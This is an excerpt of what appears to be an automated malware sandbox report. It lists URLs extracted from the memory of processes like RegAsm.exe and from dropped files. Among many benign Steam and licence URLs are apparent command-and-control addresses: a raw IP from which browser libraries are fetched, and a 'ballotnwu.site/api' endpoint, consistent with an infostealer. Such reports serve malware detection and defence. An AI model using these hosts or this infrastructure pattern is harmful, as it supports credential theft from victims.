                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                                Source: RDPWInst.exe, 00000013.00000002.2487798844.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, RDPWInst.exe.12.drString found in binary or memory: http://www.apache.org/licenses/
                                Source: RDPWInst.exe, 00000013.00000002.2487798844.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, RDPWInst.exe.12.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.2.dr, 66f5db9e54794_vfkagks[1].exe.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, GIIIIJDHJE.exe.2.dr, nss3.dll.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.drString found in binary or memory: http://www.digicert.com/CPS0
                                Source: file.exe, 66f5db9e54794_vfkagks[1].exe.2.dr, GIIIIJDHJE.exe.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.drString found in binary or memory: http://www.entrust.net/rpa03
                                Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.2.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                                Source: RegAsm.exe, 00000002.00000002.2471362906.00000000199DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486219527.000000001F97D000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                                Source: 76561199780418869[1].htm.2.drString found in binary or memory: https://5.75.211.162
                                Source: RegAsm.exe, 0000000B.00000002.2820883103.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162.exe
                                Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D01000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/
                                Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/2
                                Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/9
                                Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/:3#
                                Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000D01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/CGDHJEGHJ
                                Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000D01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/D
                                Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/V3
                                Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/Z
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/freebl3.dll
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/freebl3.dlll
                                Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/g
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/mozglue.dll&
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/mozglue.dllX
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/msvcp140.dll0
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/msvcp140.dll4
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/nss3.dll
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/softokn3.dll
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/softokn3.dllv
                                Source: RegAsm.exe, 0000000B.00000002.2820883103.000000000055E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/sqlp.dll
                                Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000D01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/sqlp.dllB
                                Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000D01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/sqlp.dllI
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/sqlp.dllV
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/vcruntime140.dll
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/vcruntime140.dllW
                                Source: RegAsm.exe, 0000000B.00000002.2820883103.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.1620.5938.132
                                Source: RegAsm.exe, 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162AEBFC
                                Source: RegAsm.exe, 0000000B.00000002.2820883103.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162HDGIE
                                Source: RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162a
                                Source: IDHIEB.2.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CD1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2501224995.0000000000CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                                Source: 76561199780418869[1].htm.2.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                                Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ballotnwu.site/
                                Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2501224995.0000000000D46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ballotnwu.site/api
                                Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ballotnwu.site:443/api
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, CBAKJE.2.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, CBAKJE.2.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                                Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
                                Source: IDHIEB.2.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                Source: IDHIEB.2.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                Source: IDHIEB.2.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
                                Source: RegAsm.exe, 0000000B.00000002.2820883103.0000000000528000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english
                                Source: RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000528000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2501224995.0000000000D5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000528000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000528000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000528000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&amp;l=engl
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english
                                Source: RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=english
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=e
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&amp;l=e
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english
                                Source: 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
